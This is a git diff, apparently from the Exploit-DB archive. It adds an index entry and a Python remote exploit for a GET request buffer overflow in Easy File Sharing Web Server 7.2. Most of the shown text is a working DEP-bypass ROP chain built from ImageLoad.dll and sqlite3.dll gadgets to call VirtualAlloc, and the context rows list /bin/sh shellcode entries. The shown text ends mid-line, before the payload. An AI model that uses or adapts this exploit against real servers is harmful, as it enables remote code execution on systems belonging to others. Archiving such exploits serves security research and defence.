diff --git a/files.csv b/files.csv index d822f346e..f0c0ec080 100644 --- a/files.csv +++ b/files.csv @@ -15688,6 +15688,7 @@ id,file,description,date,author,platform,type,port 42296,platforms/unix/remote/42296.rb,"GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)",2017-07-05,Metasploit,unix,remote,443 42297,platforms/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,php,remote,7778 42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0 +42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 diff --git a/platforms/windows/remote/42304.py b/platforms/windows/remote/42304.py new file mode 100755 index 000000000..d824a05e6 --- /dev/null +++ b/platforms/windows/remote/42304.py @@ -0,0 +1,151 @@ +#!/usr/bin/python +# Exploit Title: Easy File Sharing Web Server 7.2 - GET Buffer Overflow (DEP Bypass with ROP) +# Date: 8 July 2017 +# Exploit Author: Sungchul Park +# Author Contact: lxmania7@gmail.com +# Vendor Homepage: http://www.sharing-file.com +# Software Link: http://www.sharing-file.com/efssetup.exe +# Version: Easy File Sharing Web Server 7.2 +# Tested on: Winows 7 SP1 + +import socket, struct + +def create_rop_chain(): + + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = [ + # For EDX -> flAllocationType(0x1000) [ EAX to EBX ] + # 0x00000000, # [-] Unable to find gadget to put 00001000 into edx + 0x10015442, # POP EAX # RETN [ImageLoad.dll] + 0xFFFFEFFF, # -1001 (static value) + 0x100231d1, # NEG EAX # RETN [ImageLoad.dll] + 0x1001614d, # DEC EAX # RETN [ImageLoad.dll] + 0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] + 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] + 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] + 0x10015442, # POP EAX # RETN [ImageLoad.dll] + 0x1004de84, # &Writable location [ImageLoad.dll] + + # For EDX -> flAllocationType(0x1000) [ EBX to EDX ] + 0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll] + 0x10022c1e, # ADD EDX,EBX # POP EBX # RETN 0x10 [ImageLoad.dll] + 0xffffffff, # Filler (Compensation for POP EBX) + + # For ESI -> &VirtualAlloc + 0x10015442, # POP EAX # RETN [ImageLoad.dll] + 0xffffffff, # Filler \ + 0xffffffff, # Filler | + 0xffffffff, # Filler | => (Compensation for RETN 0x10) + 0xffffffff, # Filler / + 0x1004d1fc, # ptr to &VirtualAlloc() [IAT ImageLoad.dll] + 0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] + 0x61c0a798, # XCHG EAX,EDI # RETN [sqlite3.dll] + 0x1001aeb4, # POP ESI # RETN [ImageLoad.dll] + 0xffffffff, # + 0x1001715d, # INC ESI # ADD AL,3A # RETN [ImageLoad.dll] + 0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] + + # For EBP -> Return Address + 0x10013860, # POP EBP # RETN [ImageLoad.dll] + 0x61c24169, # & push esp # ret [sqlite3.dll] + + # For EBX -> dwSize(0x01) + 0x100132ba, # POP EBX # RETN [ImageLoad.dll] + 0xffffffff, # + 0x61c2785d, # INC EBX # ADD AL,83 # RETN [sqlite3.dll] + 0x1001f6da, # INC EBX # ADD AL,83 # RETN [ImageLoad.dll] + + # For ECX -> flProtect(0x40) + 0x10019dfa, # POP ECX # RETN [ImageLoad.dll] + 0xffffffff, # + 0x61c68081, # INC ECX # ADD AL,39 # RETN [sqlite3.dll] + 0x61c68081, # INC ECX # ADD AL,39 # RETN [sqlite3.dll] + 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll] + 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll] + 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll] + 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll] + 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll] + 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll] + + # For EDI -> ROP NOP + 0x61c373a4, # POP EDI # RETN [sqlite3.dll] + 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] + # For EAX -> NOP(0x90) + 0x10015442, # POP EAX # RETN [ImageLoad.dll] + 0x90909090, # nop + 0x100240c2, # PUSHAD # RETN [ImageLoad.dll] + ] + return ''.join(struct.pack('